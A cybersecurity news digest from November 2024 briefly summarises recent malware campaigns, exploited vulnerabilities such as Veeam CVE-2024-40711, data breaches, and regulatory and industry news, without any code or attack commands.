π Whatβs happening in cybersecurity today?
Phishing, Excel Exploit, Fileless, Remcos RAT, Veeam, Remote Code Execution, Frag Ransomware, Microsoft, Bookings, Flaw, Hackers, User Accounts, njRAT, Mr. Skeleton RAT, NPM Packages, Roblox, Users, Data-Stealing, Malware, Set Forth, Breach, Personal Data, DeltaPrime, Protocol, ARB, AVAX, Tokens, Israel, Credit Card, Readers, Gas Stations, Supermarkets, Hautes-PyrΓ©nΓ©es, Messaging System, Space Bears Group, Intermed Hospital, US, TSA, Cybersecurity Rules, Transportation Sector, Nigeria, UK, Strategic Partnership, Entrust, Trusted Certificate Authority, Bitcoin Fog, Laundering Crypto, Malwarebytes, AzireVPN, Privacy
Listen to the full podcast
π¨Β Cyber Alerts
1. Fileless Remcos RAT Spread via Excel Exploit
Cybersecurity experts have identified a new phishing campaign that spreads a fileless variant of the Remcos RAT malware, leveraging an Excel exploit to compromise victimsβ systems. The attack begins with a purchase order-themed phishing email containing a malicious Excel attachment. Once opened, the document exploits a known Microsoft Office vulnerability (CVE-2017β0199) to download an HTML Application (HTA) file, launching it via mshta.exe.
2. Veeam Flaw Used to Spread Frag Ransomware
Cybercriminals are exploiting a critical vulnerability in Veeam Backup & Replication software (CVE-2024β40711) to deploy a new ransomware strain named βFrag.β This remote code execution flaw, rated 9.8 in severity, allows attackers to create unauthorized administrator accounts and execute ransomware on compromised networks. Sophos X-Ops researchers report that a threat group, STAC 5881, is using compromised VPN appliances for initial access before leveraging the Veeam vulnerability.
3. Microsoft Bookings Flaw Allows Impersonation
A critical security vulnerability in Microsoft Bookings has been discovered, allowing attackers to create unauthorized Entra (formerly Azure AD) accounts and impersonate legitimate users within organizations using Microsoft 365 services. The flaw, found in the βShared Booking Pagesβ feature, enables attackers to generate fully functional accounts without administrative permissions by simply creating a shared Booking page. This exploitation can lead to significant security risks, including the ability to bypass impersonation filters, reset passwords for external services, and establish hidden mailboxes for phishing attacks or email interception.
4. New njRAT Malware Variant Found in the Wild
Mr.Skeleton is a newly discovered Remote Access Trojan (RAT) that has been spotted in the wild and is based on the well-known njRAT (Ratenjay) malware family. Recently advertised for sale on dark web platforms, this variant boasts a range of malicious capabilities including remote access to infected systems, file and registry manipulation, desktop control, keylogging, and remote control of the deviceβs camera.
5. Malicious NPM Packages Target Roblox Users
A recent cybersecurity campaign has targeted the npm package repository with malicious JavaScript libraries designed to infect Roblox users with data-stealing malware, including Skuld and Blank-Grabber. The rogue packages, such as βnode-dllsβ and βrolimons-api,β were crafted to deceive developers by masquerading as legitimate libraries. These packages contain obfuscated code that downloads and executes malware, harvesting sensitive information from infected systems and exfiltrating the data via Discord webhook or Telegram.
π₯ Cyber Incidents
6. Set Forth Breach Exposes 1.5 Million Users
Set Forth, Inc., a company offering debt relief services, has disclosed a significant data breach affecting 1.5 million individuals, including over 3,000 residents of Maine. The breach, which was identified on May 21, 2024, compromised sensitive personal information such as names, Social Security numbers, addresses, and dates of birth. While Set Forth has stated there is no evidence of misuse of the data, the company is offering identity theft protection services and has implemented enhanced security measures to prevent future incidents.
7. DeltaPrime Exploited for $4.8 Million
The DeltaPrime DeFi liquidity protocol has been exploited for approximately $4.8 million in digital assets, primarily ARB and AVAX tokens, in a breach still under investigation. The attack began when the exploiter contributed liquidity to the protocol, which was confirmed by on-chain intelligence firm PeckShield. In response, the DeltaPrime team paused operations on both the Arbitrum and Avalanche blockchains to investigate the incident further.
8. Attack Disrupts Israeli Credit Card Readers
A suspected cyberattack disrupted credit card readers at gas stations and supermarkets across Israel on November 10, 2024, causing widespread malfunctioning. The company responsible for the readersβ cybersecurity, Hyp Credit Guard, confirmed that the issue was likely caused by a denial-of-service (DDoS) attack targeting communication providers. The attack caused an hour-long crash but was quickly mitigated, with services restored shortly after.
9. Cyberattack Disrupts Hautes-PyrΓ©nΓ©es Systems
A cyberattack has disrupted the messaging system of Franceβs Hautes-PyrΓ©nΓ©es Department since Thursday morning, prompting officials to advise users to contact services via phone or the online messaging platform. Pascal Saurel, the general director of services, confirmed the attack was isolated to the messaging system and assured that the departmentβs cybersecurity measures enabled the rapid identification of the issue. Saurel emphasized that there was no ransom demand or threat to sensitive data.
10. Space Bears Group Breach Mongolian Hospital
The Space Bears hacking group has reportedly breached Intermed Hospital, exfiltrating sensitive data, including databases and personal information. In a statement issued by the group, they claimed responsibility for the attack and set a ransom deadline for November 15, 2024. The hospital is working to assess the scope of the breach and secure affected systems. This cyberattack highlights the growing threat to healthcare institutions and their vulnerability to cybercrime.
π’ Cyber News
11. New Security Rules Proposed for Transport
The Transportation Security Administration (TSA) has proposed new regulations aimed at strengthening cybersecurity within the U.S. surface transportation sector, including pipelines and railroads. These rules would formalize previous directives issued after the 2021 Colonial Pipeline ransomware attack and require affected companies to implement comprehensive cyber risk management plans. Key elements of the plans include annual cybersecurity evaluations, assessments for vulnerabilities, and operational measures to prevent, detect, and recover from cyber incidents.
12. Nigeria and UK Partner to Combat Cybercrime
Nigeria and the United Kingdom have formed a strategic partnership aimed at combating rising cybercrime and strengthening digital security. This collaboration was highlighted during a high-level roundtable meeting in Abuja, where industry leaders from both nations discussed strategies to address cyber threats. The partnership, led by Kashifu Inuwa, Director-General of Nigeriaβs National Information Technology Development Agency, focuses on enhancing Nigeriaβs cyber resilience to support national security and economic growth.
13. Entrust to Stop as Certificate Authority
Entrust, a prominent certificate authority (CA), will soon stop operating as a trusted CA due to persistent security and operational concerns, according to recent announcements from Google and Mozilla. Following years of troubling incidents, including failures in incident handling and compliance with CA/Browser Forum rules, browser makers have decided to revoke trust in Entrustβs newly issued digital certificates. The decision affects all new certificates issued by Entrust, with existing certificates remaining valid until their expiration.
14. Bitcoin Fog Founder Sentenced for 12 Years
Roman Sterlingov, the founder of the Bitcoin Fog cryptocurrency mixer, has been sentenced to 12 years and six months in prison for his role in laundering over $400 million in illicit funds between 2011 and 2021. The U.S. Department of Justice revealed that Bitcoin Fog was one of the darknetβs longest-running mixers, enabling cybercriminals to hide the origin of their proceeds, primarily from illegal activities such as drug trafficking, identity theft, and child exploitation. In addition to his prison sentence, Sterlingov must forfeit $395.56 million in assets and his stake in the Bitcoin Fog wallet, which holds over $100 million in bitcoin.
15. Malwarebytes Acquires AzireVPN for Privacy
Malwarebytes, a leading cybersecurity firm, has acquired AzireVPN, a Swedish privacy-focused VPN provider. This acquisition aims to enhance Malwarebytesβ product offerings by integrating AzireVPNβs advanced technologies, particularly its Blind Operator tool, which ensures the security of user traffic by disabling remote and local server access. AzireVPN is renowned for its strong commitment to privacy, with a focus on preventing unauthorized access and traffic interception.
Copyright Β© 2024 CyberMaterial. All Rights Reserved.
